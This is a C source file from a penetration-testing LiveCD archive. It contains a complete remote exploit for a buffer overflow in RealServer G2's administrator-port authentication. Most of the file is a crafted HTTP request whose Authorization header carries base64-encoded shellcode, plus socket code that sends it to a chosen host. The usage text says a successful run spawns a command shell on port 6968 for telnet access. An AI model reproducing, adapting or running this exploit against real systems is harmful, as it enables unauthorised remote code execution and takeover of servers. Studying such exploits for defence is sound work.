home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / realserver / rau.c

< prev

next >

Wrap

C/C++ Source or Header  |  2005-02-12  |  13KB  |  554 lines

---

1. /* RealNetworks RealServer G2 buffer overflow exploit
2.  
3.  *
4.  
5.  * by dark spyrit <dspyrit@beavuh.org>
6.  
7.  * quick unix port by team teso
8.  
9.  *
10.  
11.  * the windows binary is available at http://www.beavuh.org.
12.  
13.  *
14.  
15.  * This exploits a buffer overflow in RealServers web authentication on
16.  
17.  * the administrator port - hence the reason the shellcode is base64 encoded.
18.  
19.  * This has been tested on the NT version with a default installation.
20.  
21.  * If RealServer is installed in a different directory than the default, the
22.  
23.  * buffer will need to be adjusted accordingly.
24.  
25.  * The administrator port is randomly selected at installation, but as you'll
26.  
27.  * only be testing on your own networks this won't matter :)
28.  
29.  */
30.  
31.  
32.  
33. #include <sys/types.h>
34.  
35. #include <sys/time.h>
36.  
37. #include <sys/socket.h>
38.  
39. #include <netinet/in.h>
40.  
41. #include <arpa/inet.h>
42.  
43. #include <unistd.h>
44.  
45. #include <errno.h>
46.  
47. #include <stdlib.h>
48.  
49. #include <stdio.h>
50.  
51. #include <string.h>
52.  
53. #include <fcntl.h>
54.  
55. #include <netdb.h>
56.  
57.  
58.  
59.  
60.  
61. /* local functions
62.  
63.  */
64.  
65. unsigned long int       net_resolve (char *host);
66.  
67. int                     net_connect (struct sockaddr_in *cs, char *server,
68.  
69.         unsigned short int port, int sec);
70.  
71.  
72.  
73. unsigned char   sploit[] =
74.  
75.         "GET /admin/index.html HTTP/1.0\x0d\x0a"
76.  
77.         "Connection: Keep-Alive\x0d\x0a"
78.  
79.         "User-Agent: Mozilla/4.04 [en] (X11; I; Beavuh OS .9 i486; Nav)\x0d\x0a"
80.  
81.         "Host: 111.111.11.1:1111\x0d\x0a"
82.  
83.         "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\x0d\x0a"
84.  
85.         "Accept-Language: en\x0d\x0a"
86.  
87.         "Accept-Charset: iso-8859-1,*,utf-8\x0d\x0a"
88.  
89.         "Authorization: Basic kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
90.  
91.         "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
92.  
93.         "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
94.  
95.         "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
96.  
97.         "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
98.  
99.         "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
100.  
101.         "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
102.  
103.         "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
104.  
105.         "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
106.  
107.         "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
108.  
109.         "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
110.  
111.         "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
112.  
113.         "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
114.  
115.         "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
116.  
117.         "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
118.  
119.         "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
120.  
121.         "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
122.  
123.         "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
124.  
125.         "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
126.  
127.         "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
128.  
129.         "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
130.  
131.         "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
132.  
133.         "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
134.  
135.         "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
136.  
137.         "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
138.  
139.         "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
140.  
141.         "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
142.  
143.         "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
144.  
145.         "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
146.  
147.         "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
148.  
149.         "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
150.  
151.         "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
152.  
153.         "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
154.  
155.         "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
156.  
157.         "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
158.  
159.         "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
160.  
161.         "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
162.  
163.         "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
164.  
165.         "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
166.  
167.         "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
168.  
169.         "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
170.  
171.         "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
172.  
173.         "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
174.  
175.         "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
176.  
177.         "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
178.  
179.         "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
180.  
181.         "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
182.  
183.         "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
184.  
185.         "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
186.  
187.         "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
188.  
189.         "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
190.  
191.         "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
192.  
193.         "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
194.  
195.         "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
196.  
197.         "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
198.  
199.         "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
200.  
201.         "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
202.  
203.         "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
204.  
205.         "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
206.  
207.         "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
208.  
209.         "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
210.  
211.         "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
212.  
213.         "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
214.  
215.         "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
216.  
217.         "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
218.  
219.         "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
220.  
221.         "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
222.  
223.         "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
224.  
225.         "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
226.  
227.         "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
228.  
229.         "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
230.  
231.         "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
232.  
233.         "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
234.  
235.         "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
236.  
237.         "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
238.  
239.         "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
240.  
241.         "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
242.  
243.         "JCQkJCQkJCQkJCQkJCQkJCQ6wiQkJBXRToAkJCQkJCQkJCQkJCQkJCQkIt0JPiL/jPAUPf"
244.  
245.         "QUFnyr1mxxovHSIAwmeL6M/aWu5mcQEbB6whW/xOL0PwzybELSTLArITAdflSUVZSs5T/E"
246.  
247.         "6tZWuLsMsCshMB1+bOcVv8Ti9D8M8mxBjLArITAdflSUVZSs5T/E6tZWuLsg8YFM8BQQFB"
248.  
249.         "AUP9X6JNqEFZT/1fsagJT/1fwM8BXULAMq1irQKtfSFBXVq1W/1fASFBXrVatVv9XwEiwR"
250.  
251.         "IkHV/9XxDPAi0b0iUc8iUdAiwaJRzgzwGa4AQGJRyxXVzPAUFBQQFBIUFCtVjPAUP9XyP9"
252.  
253.         "28P9XzP92/P9XzEhQUFP/V/SL2DPAtARQwegEUP9X1IvwM8CLyLUEUFBXUVD/d6j/V9CDP"
254.  
255.         "wF8IjPAUFf/N1b/d6j/V9wLwHQvM8BQ/zdWU/9X+GpQ/1fg68gzwFC0BFBWU/9X/FczyVF"
256.  
257.         "QVv93rP9X2GpQ/1fg66pQ/1fkkNLcy9fc1aqrmdrr/Pjt/Mnw6fyZ3vztyu346+3s6dD3/"
258.  
259.         "/bYmdrr/Pjt/Mnr9vr86urYmdr19ur80fj3/fX8mcn8/PLX+PT8/cnw6fyZ3vX2+/j12PX"
260.  
261.         "19vqZzuvw7fzf8PX8mcv8+P3f8PX8mcr1/Pzpmdzh8O3J6/b6/Orqmc7K1trSqquZ6vb68"
262.  
263.         "vztmfvw9/2Z9fDq7fz3mfj6+vzp7Znq/Pf9mev8+u+Zm5mCoZmZmZmZmZmZmZmZmfr0/bf"
264.  
265.         "84fyZ/////w==\x0d\x0a\x0d\x0a\x00";
266.  
267.  
268.  
269.  
270.  
271. int
272.  
273. main (int argc, char **argv)
274.  
275. {
276.  
277.         int                     socket;
278.  
279.         char                    *server;
280.  
281.         unsigned short int      port;
282.  
283.         struct sockaddr_in      sa;
284.  
285.  
286.  
287.         if (argc != 3) {
288.  
289.                 printf ("RealServer G2 exploit [NT] - please check http://www.beavuh.org for info.\n"
290.  
291.                         "by dark spyrit <dspyrit@beavuh.org>, port by team teso\n\n"
292.  
293.                         "usage: %s <host> <admin_port>\n"
294.  
295.                         "eg - %s host.com 6666\n"
296.  
297.                         "the exploit will spawn a command prompt on port 6968\n\n", argv[0], argv[0]);
298.  
299.  
300.  
301.                 exit (EXIT_FAILURE);
302.  
303.         }
304.  
305.  
306.  
307.         server = argv[1];
308.  
309.         port = atoi (argv[2]);
310.  
311.  
312.  
313.         socket = net_connect (&sa, server, port, 45);
314.  
315.         if (socket <= 0) {
316.  
317.                 perror ("net_connect");
318.  
319.                 exit (EXIT_FAILURE);
320.  
321.         }
322.  
323.  
324.  
325.         write (socket, sploit, strlen (sploit));
326.  
327.         sleep (1);
328.  
329.         close (socket);
330.  
331.  
332.  
333.         printf ("data sent. try \"telnet %s 6968\" now \n", server);
334.  
335.  
336.  
337.         exit (EXIT_SUCCESS);
338.  
339. }
340.  
341.  
342.  
343.  
344.  
345. unsigned long int
346.  
347. net_resolve (char *host)
348.  
349. {
350.  
351.         long            i;
352.  
353.         struct hostent  *he;
354.  
355.  
356.  
357.         i = inet_addr (host);
358.  
359.         if (i == -1) {
360.  
361.                 he = gethostbyname (host);
362.  
363.                 if (he == NULL) {
364.  
365.                         return (0);
366.  
367.                 } else {
368.  
369.                         return (*(unsigned long *) he->h_addr);
370.  
371.                 }
372.  
373.         }
374.  
375.  
376.  
377.         return (i);
378.  
379. }
380.  
381.  
382.  
383.  
384.  
385. int
386.  
387. net_connect (struct sockaddr_in *cs, char *server,
388.  
389.         unsigned short int port, int sec)
390.  
391. {
392.  
393.         int             n, len, error, flags;
394.  
395.         int             fd;
396.  
397.         struct timeval  tv;
398.  
399.         fd_set          rset, wset;
400.  
401.  
402.  
403.         /* first allocate a socket */
404.  
405.         cs->sin_family = AF_INET;
406.  
407.         cs->sin_port = htons (port);
408.  
409.         fd = socket (cs->sin_family, SOCK_STREAM, 0);
410.  
411.         if (fd == -1)
412.  
413.                 return (-1);
414.  
415.  
416.  
417.         cs->sin_addr.s_addr = net_resolve (server);
418.  
419.         if (cs->sin_addr.s_addr == 0) {
420.  
421.                 close (fd);
422.  
423.                 return (-1);
424.  
425.         }
426.  
427.  
428.  
429.         flags = fcntl (fd, F_GETFL, 0);
430.  
431.         if (flags == -1) {
432.  
433.                 close (fd);
434.  
435.                 return (-1);
436.  
437.         }
438.  
439.         n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
440.  
441.         if (n == -1) {
442.  
443.                 close (fd);
444.  
445.                 return (-1);
446.  
447.         }
448.  
449.  
450.  
451.         error = 0;
452.  
453.  
454.  
455.         n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
456.  
457.         if (n < 0) {
458.  
459.                 if (errno != EINPROGRESS) {
460.  
461.                         close (fd);
462.  
463.                         return (-1);
464.  
465.                 }
466.  
467.         }
468.  
469.         if (n == 0)
470.  
471.                 goto done;
472.  
473.  
474.  
475.         FD_ZERO(&rset);
476.  
477.         FD_ZERO(&wset);
478.  
479.         FD_SET(fd, &rset);
480.  
481.         FD_SET(fd, &wset);
482.  
483.         tv.tv_sec = sec;
484.  
485.         tv.tv_usec = 0;
486.  
487.  
488.  
489.         n = select(fd + 1, &rset, &wset, NULL, &tv);
490.  
491.         if (n == 0) {
492.  
493.                 close(fd);
494.  
495.                 errno = ETIMEDOUT;
496.  
497.                 return (-1);
498.  
499.         }
500.  
501.         if (n == -1)
502.  
503.                 return (-1);
504.  
505.  
506.  
507.         if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
508.  
509.                 if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
510.  
511.                         len = sizeof(error);
512.  
513.                         if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
514.  
515.                                 errno = ETIMEDOUT;
516.  
517.                                 return (-1);
518.  
519.                         }
520.  
521.                         if (error == 0) {
522.  
523.                                 goto done;
524.  
525.                         } else {
526.  
527.                                 errno = error;
528.  
529.                                 return (-1);
530.  
531.                         }
532.  
533.                 }
534.  
535.         } else
536.  
537.                 return (-1);
538.  
539.  
540.  
541. done:
542.  
543.         n = fcntl(fd, F_SETFL, flags);
544.  
545.         if (n == -1)
546.  
547.                 return (-1);
548.  
549.  
550.  
551.         return (fd);
552.  
553. }
554.